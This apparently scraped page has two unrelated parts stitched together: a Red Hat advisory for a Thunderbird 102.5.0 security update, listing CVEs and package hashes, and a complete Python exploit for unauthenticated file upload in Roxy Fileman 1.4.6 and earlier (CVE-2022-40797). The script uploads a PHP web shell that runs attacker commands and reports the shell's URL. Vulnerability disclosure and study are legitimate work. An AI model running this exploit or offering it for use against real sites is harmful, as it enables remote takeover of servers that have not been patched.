* CVE-2022-45405: Mozilla: Use-after-free in InputStream implementation
* CVE-2022-45406: Mozilla: Use-after-free of a JavaScript Realm
* CVE-2022-45408: Mozilla: Fullscreen notification bypass via windowName
* CVE-2022-45409: Mozilla: Use-after-free in Garbage Collection
* CVE-2022-45410: Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy
* CVE-2022-45411: Mozilla: Cross-Site Tracing was possible via non-standard override headers
* CVE-2022-45412: Mozilla: Symlinks may resolve to partially uninitialized buffers
* CVE-2022-45416: Mozilla: Keystroke Side-Channel Leakage
* CVE-2022-45418: Mozilla: Custom mouse cursor could have been drawn over browser UI
* CVE-2022-45420: Mozilla: Iframe contents could be rendered outside the iframe
* CVE-2022-45421: Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-11-21

Updated:

2022-11-21

**RHSA-2022:8561 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: thunderbird security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for thunderbird is now available for Red Hat Enterprise Linux 9.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mozilla Thunderbird is a standalone mail and newsgroup client.  

This update upgrades Thunderbird to version 102.5.0.  

Security Fix(es):  

*   Mozilla: Service Workers might have learned size of cross-origin media files (CVE-2022-45403)
*   Mozilla: Fullscreen notification bypass (CVE-2022-45404)
*   Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)
*   Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)
*   Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)
*   Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)
*   Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5 (CVE-2022-45421)
*   Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy (CVE-2022-45410)
*   Mozilla: Cross-Site Tracing was possible via non-standard override headers (CVE-2022-45411)
*   Mozilla: Symlinks may resolve to partially uninitialized buffers (CVE-2022-45412)
*   Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)
*   Mozilla: Custom mouse cursor could have been drawn over browser UI (CVE-2022-45418)
*   Mozilla: Iframe contents could be rendered outside the iframe (CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to take effect.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 9 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 9 s390x
*   Red Hat Enterprise Linux for Power, little endian 9 ppc64le
*   Red Hat Enterprise Linux for ARM 64 9 aarch64

**Fixes**

*   BZ - 2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files
*   BZ - 2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass
*   BZ - 2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation
*   BZ - 2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm
*   BZ - 2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName
*   BZ - 2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection
*   BZ - 2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy
*   BZ - 2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers
*   BZ - 2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers
*   BZ - 2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage
*   BZ - 2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI
*   BZ - 2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe
*   BZ - 2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

**CVEs**

*   CVE-2022-45403
*   CVE-2022-45404
*   CVE-2022-45405
*   CVE-2022-45406
*   CVE-2022-45408
*   CVE-2022-45409
*   CVE-2022-45410
*   CVE-2022-45411
*   CVE-2022-45412
*   CVE-2022-45416
*   CVE-2022-45418
*   CVE-2022-45420
*   CVE-2022-45421

**Red Hat Enterprise Linux for x86\_64 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

x86\_64

thunderbird-102.5.0-2.el9\_1.x86\_64.rpm

SHA-256: 70b6eebb386c9eb020625c9780e9e575eb148ab24936c165e55e9fc95c697cff

thunderbird-debuginfo-102.5.0-2.el9\_1.x86\_64.rpm

SHA-256: 5cad7b166fe1c17f212715e592368e246b5dda584ac54aed93088a3839e0aa4d

thunderbird-debugsource-102.5.0-2.el9\_1.x86\_64.rpm

SHA-256: cd71bbf884ca097133417982d0c8fb8c46337bfb610d5c91660c6f2219c23640

**Red Hat Enterprise Linux for IBM z Systems 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

s390x

thunderbird-102.5.0-2.el9\_1.s390x.rpm

SHA-256: 983aeb700304f1b5721c132cf8f630374b2b74a9a40e1b9aaba1ed862ff3a697

thunderbird-debuginfo-102.5.0-2.el9\_1.s390x.rpm

SHA-256: e1cbde81ef158b577194e2d0f35afe34731773c7331907f3f8bb26289e4fc0f9

thunderbird-debugsource-102.5.0-2.el9\_1.s390x.rpm

SHA-256: 8e674898bf06b79a08831630f28fd72b9dd4da6f55ad657dcd36ac2801af4da0

**Red Hat Enterprise Linux for Power, little endian 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

ppc64le

thunderbird-102.5.0-2.el9\_1.ppc64le.rpm

SHA-256: ee77c89721799a4b8a71f31c56c7954f1e9faceca21b8aeea3dfa7e4a1dcc8a8

thunderbird-debuginfo-102.5.0-2.el9\_1.ppc64le.rpm

SHA-256: b6535c2da488533f177e3676c5271b79b88e83cf52a828892a2197d922694dbe

thunderbird-debugsource-102.5.0-2.el9\_1.ppc64le.rpm

SHA-256: 7f687085d541662362a89be5699452cc4f0136f7784250a69cdb9c095a78a2bb

**Red Hat Enterprise Linux for ARM 64 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

aarch64

thunderbird-102.5.0-2.el9\_1.aarch64.rpm

SHA-256: 6cedfac8f79fe89bffe1288bfc80502164a504ba381b123363a5fadb2a9a7e14

thunderbird-debuginfo-102.5.0-2.el9\_1.aarch64.rpm

SHA-256: 8855243382d1d825a03276c28b9ae072c49478aa13f0b978e64fd558008441f3

thunderbird-debugsource-102.5.0-2.el9\_1.aarch64.rpm

SHA-256: 80088b35459faad75bcffa52e85f2a41880b257be060255dc04f914b4fdfd02e

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:8561: Red Hat Security Advisory: thunderbird security update

Roxy Fileman versions 1.4.6 and below remote shell upload proof of concept exploit.

    # Exploit Title: Roxy Fileman <= 1.4.6 Arbitrary File Upload (Unathenticated)# Date: 11/12/2022# Exploit Author: Hadi Mene <hadi_mene@hotmail.com># Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20210126213412/https://roxyfileman.com/download.php?f=1.4.6-php# Version: <= 1.4.6# Tested on: Ubuntu 18.04 # CVE : CVE-2022-40797# https://nvd.nist.gov/vuln/detail/CVE-2022-40797 import requestsfrom optparse import OptionParserfrom os.path import basenamebanner =  '#################################################\n'banner += '# Roxy Fileman <= 1.4.6 Arbitrary File Upload   #\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\tCVE-2022-40797 exploit code\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#  Author : Hadi Mene <hadi_mene@hotmail.com>\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#################################################\n'parser = OptionParser()parser.add_option("-u", "--url", dest="url",                  help="url of roxy fileman installation")parser.add_option("-s", "--shell",dest="shell", default=False,                  help="path of the php shell if not specified defaut shell will be uploaded ")(options, args) = parser.parse_args()if options.url is None:  parser.error('URL is required use -h for help')url = options.url#It seems that in some versions of the app an '/' in the end of the url breaks the exploit codeif (url.endswith('/')):  url = url[:-1] # we delete that '/'  webroot = options.url.split('/')[3:]webroot = '/'+ '/'.join(webroot)if (webroot.endswith('/')):  webroot = webroot[:-1]  webroot = webroot+'/Uploads'if options.shell:  shell = open(options.shell,'r').read()  filename = basename(options.shell)  filename = filename.split('.')[0]  else:  # default shell  shell = "<?php system($_GET['cmd']); ?>"  filename = 'shell'headers = {    'Host': (url.split('/')[2]),    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',    'Accept': '*/*',    'Accept-Language': 'en-US,en;q=0.5',    'Content-Type': 'multipart/form-data; boundary=---------------------------39556237418830295983527604767',    'Origin': (url.split('/')[2]),    'Connection': 'close',}data = '-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="method"\r\n\r\najax\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="d"\r\n\r\n'+(webroot)+'\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="files[]"; filename="'+(filename)+'.phar"\r\nContent-Type: text/plain\r\n\r\n'+shell+'\n\r\n-----------------------------39556237418830295983527604767--\r\n'#We check if a file with the same filename is already there #because Roxy doesn't overwrite file instead it changes the filename of the newly uploaded fileif 'href="'+filename+'.phar"' in (requests.get(url+'/Uploads/').text):  already_uploaded = Trueelse:  already_uploaded = False  # file uploadreq = requests.post(url+'/php/upload.php', headers=headers, data=data, verify=False)response = (req.text)print(banner)if '{"res":"ok","msg":""}' in (response):# success  print('File Uploaded Successfully!!!')    if already_uploaded:    print('A file with the same filename is already on the server..')    print('URL: '+url+'/Uploads/'+(filename)+' - Copy X.phar ')      else:    print('URL: '+url+'/Uploads/'+(filename)+'.phar')else:  # failure  print('Shell Upload Failed :((( ')  print(response) #debug

Tag

#firefox